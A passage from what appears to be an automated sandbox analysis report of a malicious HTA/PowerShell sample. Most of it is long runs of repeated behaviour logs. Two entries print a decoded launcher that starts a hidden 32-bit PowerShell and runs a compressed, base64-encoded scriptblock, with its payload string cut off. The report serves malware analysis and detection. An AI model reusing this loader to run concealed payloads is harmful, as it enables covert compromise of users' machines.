MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04900AAB push eax; iretd 1_2_04900ACD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_049012D8 push esp; retf 1_2_049012E1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04900AE5 push esp; retf 1_2_04900AEA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_02C6C4C8 push 8B07DBEDh; retn 518Dh3_2_02C6CAA1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_02C6955B push eax; ret 3_2_02C69563
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1979Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1140Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5374Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4378Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2888Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep count: 5374 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep time: -18446744073709540s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep count: 4378 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000003.00000002.2296504585.00000000070CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK''+''SarvytjEOSkL{1}z79fEE8oPpfRXpc{1''+''}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4''+''R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX''+''9zS''+''4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq''+''l+V''+''YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW''+''kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O''+''BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59''+''FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU''+''D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt''+''SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbb
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK''+''SarvytjEOSkL{1}z79fEE8oPpfRXpc{1''+''}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4''+''R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX''+''9zS''+''4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq''+''l+V''+''YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW''+''kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O''+''BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59''+''FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU''+''D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt''+''SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbJump to behavior
